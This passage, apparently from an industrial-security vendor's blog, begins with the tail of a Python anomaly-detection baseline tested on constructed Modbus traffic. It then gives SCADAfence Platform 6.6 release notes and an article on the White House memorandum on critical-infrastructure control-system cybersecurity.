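        self.alerts = []      # (timestamp, key) for each newly seen behaviour

    def _expire(self, now):
        """Forget every key whose last observation is older than the window."""
        stale = [k for k, t in self.last_seen.items() if now - t > self.forget_after]
        for k in stale:
            del self.last_seen[k]
        return stale

    def observe(self, flow):
        """Record a flow; return True if it was alerted as new behaviour."""
        self._expire(flow.ts)
        key = flow.key()
        is_new = key not in self.last_seen and flow.ts >= self.learning_until
        if is_new:
            self.alerts.append((flow.ts, key))
        # Self-tuning: the key is recorded either way, so repeated traffic is
        # alerted once and then treated as known until it ages out again.
        self.last_seen[key] = flow.ts
        return is_new


def run_scenario():
    """Constructed traffic: steady HMI polling, an already-compromised host,
    and a new engineering station. Returns the alerts the baseline raised."""
    def day(n, hour=8):
        return datetime(2021, 11, 1, hour) + timedelta(days=n)

    flows = []
    # HMI polls the PLC every day: expected, never forgotten.
    for n in range(0, 21):
        flows.append(Flow(day(n), "10.1.2.20", "10.1.10.7", "modbus", "read_holding_registers"))
    # Host compromised before learning started: writes during learning and once after.
    flows.append(Flow(day(1, 9), "10.1.2.50", "10.1.10.7", "modbus", "write_multiple_registers"))
    flows.append(Flow(day(3, 9), "10.1.2.50", "10.1.10.7", "modbus", "write_multiple_registers"))
    # New engineering workstation appears after learning: alerted.
    flows.append(Flow(day(5, 9), "10.1.2.60", "10.1.10.7", "s7comm", "write_var"))
    # The compromised host resumes after 17 days of silence: forgotten, so alerted.
    flows.append(Flow(day(20, 9), "10.1.2.50", "10.1.10.7", "modbus", "write_multiple_registers"))
    flows.sort(key=lambda f: f.ts)

    baseline = AgingBaseline(start=day(0))
    for f in flows:
        baseline.observe(f)
    return baseline.alerts


if __name__ == "__main__":
    for ts, key in run_scenario():
        print(ts.isoformat(), key)
```

The scenario produces two alerts: the engineering station on day 5 and the compromised host on day 20. The write on day 3 is not alerted because the same behavior was learned on day 1; only after it has been absent longer than the retention window is it treated as new again. A shorter window catches returning attackers sooner at the cost of re-alerting on rare but legitimate maintenance traffic.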

New System Mode – Offline PCAP Analysis

SCADAfence’s customers and partners can now run PCAP analysis as part of an offline risk assessment. Traffic captured from the customer’s network is loaded into the platform as a file and analyzed without any connection to the live network, so users gain an understanding of their traffic with no effect on production and no interference from live traffic during the analysis.

Governance 2.0

SCADAfence Platform release 6.6 ships with the latest version of our IT/OT governance and compliance portal. After continuous customer feedback and dozens of deployments, we have updated the Governance Portal: in addition to a complete UI facelift, version 2.0 is faster, returns more detailed results and supports more compliance regulations. In fact, we’ve added nine new compliance frameworks to fit our customers’ growing compliance needs.


Diagram 02. The SCADAfence Governance Dashboard

Scaling with SCADAfence’s Multi-Site Version 2.6

SCADAfence’s customer deployments are growing to hundreds of sites, and configuring each site’s settings individually is a significant burden for most administrators. With the Multi-Site Portal’s central configuration, this is no longer an issue.


Diagram 03. The SCADAfence Multi-Site Dashboard

The Multi-Site Portal now allows customers to distribute their configurations to all their sites from the Multi-Site Portal to the distributed SCADAfence Platforms. The security configuration is managed via profiles and covers many security aspects including alerts policy, IP groups, central licensing, 3rd Party tools integrations and more.

With central configuration, administrators save time and work more efficiently when running the SCADAfence Platform across multiple sites.

Central Software Updates

As part of the central configuration capabilities, SCADAfence customers now have the opportunity to update the SCADAfence Platform software from the Multi-Site Portal. This new feature allows customers to upgrade their SCADAfence Platforms with the latest version in all their sites centrally from the Multi-Site Portal, without the need to access each site’s Platform and upgrade it manually.

This gives organizations and their administrators more control over their sites and OT networks, which saves time and improves productivity.

Sprinting Into 2022

This latest product release had a strong emphasis on user experience, security and improving the management of different industrial protocols (ENIP/CIP, S7, BACnet, etc.). In conclusion, the SCADAfence Platform version 6.6 enables organizations in manufacturing, critical infrastructures and more industrial sectors to operate securely, reliably and efficiently with the right amount of OT security within their industrial environments.

We’re confident that these updates and those coming in the future will bring a better experience for users and we are here to help with all your OT security needs.


The White House Pushes to Strengthen Critical Infrastructure Security

In the wake of the ransomware attacks on Colonial Pipeline and JBS Foods, the intrusion at the Oldsmar, Florida water treatment plant, and other incidents affecting critical infrastructure, President Joe Biden signed a national security memorandum aimed at strengthening cybersecurity for critical infrastructure. The memorandum seeks to improve information sharing and collaboration with the private sector. It also aims to raise the security of ICS and address the security risks and vulnerabilities specific to critical infrastructure environments.

The National Security Memorandum on Improving Cybersecurity for Critical Infrastructure Control Systems formalizes the Industrial Control Systems (ICS) Cybersecurity Initiative and directs the Department of Homeland Security, in coordination with the Department of Commerce through its National Institute of Standards and Technology (NIST), to create and issue cybersecurity performance goals for critical infrastructure.

Under the initiative, the federal government and the critical infrastructure sector will work together to defend the critical infrastructure of the United States by “encouraging and facilitating the deployment of technologies and systems that provide threat visibility, indications, detection, and warnings, and that facilitate response capabilities for cybersecurity in essential control system and operational technology networks,” according to the memorandum.

Additionally, the memorandum will increase the adoption of cyber security solutions that provide better visibility into ICS, “The goal of the Initiative is to greatly expand deployment of these technologies across priority critical infrastructure.”

Another objective of this initiative is to deploy interconnected industrial sensor technology. By deploying sensors, critical infrastructure operators gain visibility into security events in their operational systems.

This will allow organizations to detect any intrusion on their network more quickly. As quoted in the memorandum, “We cannot address threats we cannot see; therefore, deploying technologies that can monitor control systems and detect malicious activity and facilitate response actions to cyber threats is central to ensuring the safe operations of these critical systems.”

Why The Industrial Control Systems Cybersecurity Initiative Matters

Following in the lines of the Biden Administration’s recent cyber security executive order, the memorandum establishes the Industrial Control Systems Cybersecurity Initiative (the “ICS Initiative”). The ICS Initiative is a collaborative effort between the Federal Government and the critical infrastructure community to improve the cybersecurity of systems supporting national critical functions.

This new initiative is important for the critical infrastructure sector as it encourages, facilitates and scales the deployment of ICS security technologies to monitor and detect malicious activity and provide the right mitigation steps in response to cyber attacks. By using the ICS Initiative as guidance, the Federal Government will collaborate with the industrial sectors to share different cyber threat information for ICS systems of critical infrastructures.

The initiative was first launched in April 2021 as a pilot within the electricity subsector, with over 150 electricity utilities representing almost 90 million customers agreeing to deploy control system cybersecurity technologies. The same effort is under way in the natural gas pipeline sector, to be followed by water and wastewater, chemical and other sectors later this year.

Critical Infrastructure Cybersecurity Performance Goals

The memorandum also directs government agencies to create and issue baseline cybersecurity goals across the critical infrastructure sectors. The specific controls required will depend on the control systems present in each critical infrastructure environment.

These measures will “further a common understanding of the baseline security practices that critical infrastructure owners and operators should follow to protect national and economic security, as well as public health and safety,” according to the memorandum.

NIST and CISA will establish the preliminary goals for control systems for critical infrastructures sectors by Sept. 22, 2021. Then the final cross-sector control systems goals will be published by July 28, 2022.

“These performance goals should serve as clear guidance to owners and operators about cybersecurity practices and postures that the American people can trust and should expect for such essential services,” the memorandum states.

Moving Forward

ICS security is not an easy task, and defending the wide range of industrial networks and facilities is often neglected or under-resourced. A voluntary collaboration between infrastructure operators and the government’s cybersecurity agencies will strengthen awareness of the attacks being mounted on critical infrastructure.

The US government’s strong emphasis on visibility is a smart move. Research into and deployment of ICS cybersecurity are only now starting to change for the better. Legacy systems are finally converging with interconnected networks, and that connectivity to the Internet has created new security risks for critical infrastructure sectors that have not been properly evaluated. The memorandum is a good first step toward better ICS security, but it is only one small step on a long road to more secure critical infrastructure.
